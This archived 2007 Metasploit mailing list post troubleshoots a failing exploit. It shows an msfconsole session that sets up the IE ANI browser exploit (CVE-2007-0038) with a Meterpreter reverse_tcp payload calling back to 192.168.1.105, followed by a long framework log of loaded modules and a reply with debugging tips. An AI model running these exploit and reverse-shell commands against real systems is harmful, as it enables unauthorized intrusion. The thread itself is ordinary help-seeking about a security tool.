Metasploit mailing list archives
favicon.ico handler & meterpreter reverse_tcp encoder problems
From: jlbrown1980 at comcast.net (jlbrown1980)
Date: Mon, 14 May 2007 12:44:00 -0400
Alright here is my log and a screenshot with what is going on.
This is what was entered into the attacking shell..
_ _
_ | | (_)_
____ ____| |_ ____ ___ ____ | | ___ _| |_
| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
|_|
=[ msf v3.1-dev
+ -- --=[ 192 exploits - 106 payloads
+ -- --=[ 17 encoders - 5 nops
=[ 36 aux
msf > use windows/browser/ani_loadimage_chunksize
msf exploit(ani_loadimage_chunksize) > set payload
windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ani_loadimage_chunksize) > set LHOST 192.168.1.105
LHOST => 192.168.1.105
msf exploit(ani_loadimage_chunksize) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 192.168.1.105 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
URIPATH no The URI to use for this exploit
(default
Payload options:
Name Current Setting Required
Description
---- --------------- --------
-----------
DLL /usr/local/msf3/data/meterpreter/metsrv.dll yes The
local pa
EXITFUNC process yes Exit
techni
LHOST 192.168.1.105 yes The
local ad
LPORT 4444 yes The
local po
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ani_loadimage_chunksize) > exploit
[*] Started reverse handler
[*] Using URL: http://192.168.1.105:8080/WGP0OVb7Z5YluSF
[*] Server started.
[*] Exploit running as background job.
msf exploit(ani_loadimage_chunksize) >
This is the output in framwork.log with LogLevel set to 3 from start to
finish.
[05/14/2007 12:26:17] [i(2)] core: Loaded encoder module
Msf::Encoders::Ppc::LongXor
from /usr/local/msf3/modules/encoders/ppc/longxor.rb.
[05/14/2007 12:26:17] [i(2)] core: Loaded encoder module
Msf::Encoders::Ppc::LongXorTag
from /usr/local/msf3/modules/encoders/ppc/longxor_tag.rb.
[05/14/2007 12:26:17] [i(2)] core: Loaded encoder module
Msf::Encoders::Sparc::LongXorTag
from /usr/local/msf3/modules/encoders/sparc/longxor_tag.rb.
[05/14/2007 12:26:17] [i(2)] core: Loaded encoder module
Msf::Encoders::X86::NonUpper
from /usr/local/msf3/modules/encoders/x86/nonupper.rb.
[05/14/2007 12:26:17] [i(2)] core: Loaded encoder module
Msf::Encoders::X86::ShikataGaNai
from /usr/local/msf3/modules/encoders/x86/shikata_ga_nai.rb.
[05/14/2007 12:26:17] [i(2)] core: Loaded encoder module
Msf::Encoders::X86::AlphaUpper
from /usr/local/msf3/modules/encoders/x86/alpha_upper.rb.
[05/14/2007 12:26:17] [i(2)] core: Loaded encoder module
Msf::Encoders::X86::FnstenvMov
from /usr/local/msf3/modules/encoders/x86/fnstenv_mov.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded encoder module
Msf::Encoders::X86::UnicodeUpper
from /usr/local/msf3/modules/encoders/x86/unicode_upper.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded encoder module
Msf::Encoders::X86::JmpCallAdditive
from /usr/local/msf3/modules/encoders/x86/jmp_call_additive.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded encoder module
Msf::Encoders::X86::Call4Dword
from /usr/local/msf3/modules/encoders/x86/call4_dword_xor.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded encoder module
Msf::Encoders::X86::NonAlpha
from /usr/local/msf3/modules/encoders/x86/nonalpha.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded encoder module
Msf::Encoders::X86::AvoidUtf8
from /usr/local/msf3/modules/encoders/x86/avoid_utf8_tolower.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded encoder module
Msf::Encoders::X86::UnicodeMixed
from /usr/local/msf3/modules/encoders/x86/unicode_mixed.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded encoder module
Msf::Encoders::X86::Countdown
from /usr/local/msf3/modules/encoders/x86/countdown.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded encoder module
Msf::Encoders::X86::AlphaMixed
from /usr/local/msf3/modules/encoders/x86/alpha_mixed.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded encoder module
Msf::Encoders::Generic::None
from /usr/local/msf3/modules/encoders/generic/none.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded encoder module
Msf::Encoders::Cmd::GenericSh
from /usr/local/msf3/modules/encoders/cmd/generic_sh.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded nop module
Msf::Nops::Ppc::Simple from /usr/local/msf3/modules/nops/ppc/simple.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded nop module
Msf::Nops::Sparc::Vlad902
from /usr/local/msf3/modules/nops/sparc/random.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded nop module
Msf::Nops::X86::SingleByte
from /usr/local/msf3/modules/nops/x86/single_byte.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded nop module
Msf::Nops::X86::Opty2 from /usr/local/msf3/modules/nops/x86/opty2.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded nop module
Msf::Nops::Php::Generic
from /usr/local/msf3/modules/nops/php/generic.rb.
[05/14/2007 12:26:31] [d(1)] core: Demand loading module
encoder/windows/browser/ani_loadimage_chunksize.
[05/14/2007 12:26:31] [d(1)] core: Demand loading module
payload/windows/browser/ani_loadimage_chunksize.
[05/14/2007 12:26:31] [d(1)] core: Demand loading module
exploit/windows/browser/ani_loadimage_chunksize.
[05/14/2007 12:26:31] [d(2)] core: Loading from
file /usr/local/msf3/modules/exploits/windows/browser/ani_loadimage_chunksize.rb
[05/14/2007 12:26:31] [i(2)] core: Loaded exploit module
Msf::Exploits::Windows::Browser::IE_ANI_CVE_2007_0038
from /usr/local/msf3/modules/exploits/windows/browser/ani_loadimage_chunksize.rb.
[05/14/2007 12:26:31] [d(1)] core: Demand loading module
nop/windows/browser/ani_loadimage_chunksize.
[05/14/2007 12:26:31] [d(1)] core: Demand loading module
auxiliary/windows/browser/ani_loadimage_chunksize.
[05/14/2007 12:26:45] [d(1)] core: Demand loading module
encoder/windows/meterpreter/reverse_tcp.
[05/14/2007 12:26:45] [d(1)] core: Demand loading module
payload/windows/meterpreter/reverse_tcp.
[05/14/2007 12:26:45] [d(2)] core: Loading from
file /usr/local/msf3/modules/payloads/stagers/windows/reverse_tcp.rb
[05/14/2007 12:26:45] [i(2)] core: Loaded payload module
Msf::Payloads::Stagers::Windows::ReverseTcp
from /usr/local/msf3/modules/payloads/stagers/windows/reverse_tcp.rb.
[05/14/2007 12:26:45] [d(2)] core: Loading from
file /usr/local/msf3/modules/payloads/stages/windows/meterpreter.rb
[05/14/2007 12:26:45] [i(2)] core: Loaded payload module
Msf::Payloads::Stages::Windows::Meterpreter
from /usr/local/msf3/modules/payloads/stages/windows/meterpreter.rb.
[05/14/2007 12:26:45] [d(3)] core: Checking compat [ with ]: sockedi to
sockedi
[05/14/2007 12:26:45] [d(2)] core: Built staged payload
windows/meterpreter/reverse_tcp.
[05/14/2007 12:26:45] [w(3)] core: Missing value for payload offset
LHOST, skipping.
[05/14/2007 12:26:45] [d(1)] core: Demand loading module
exploit/windows/meterpreter/reverse_tcp.
[05/14/2007 12:26:45] [d(1)] core: Demand loading module
nop/windows/meterpreter/reverse_tcp.
[05/14/2007 12:26:45] [d(1)] core: Demand loading module
auxiliary/windows/meterpreter/reverse_tcp.
Screenshot of acitivity
http://img385.imageshack.us/my.php?image=screenshotde0.png
So that's where I'm at, still cant figure out why it's not loading the
exploit properly.
Kurt Grutzmacher <grutz[at]jingojango.net> Wrote
It would probably be alot easier to SSH into your unix box from the
Windows platform. You'll not have to walk as often and then be able to troubleshoot tons faster.
Copy/paste your msfconsole session. Also do a "setg LogLevel 3", close and re-open msfconsole and run the explot again. Check ~/.msf/logs/framework.log for errors.
--
..:[ grutz at jingojango dot net ]:..
GPG fingerprint: 5FD6 A27D 63DB 3319 140F B3FB EC95 2A03 8CB3 ECB4
"There's just no amusing way to say, 'I have a CISSP'."
-------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20070514/987873f6/attachment.htm>
Current thread:
- favicon.ico handler & meterpreter reverse_tcp encoder problems jlbrown1980 (May 14)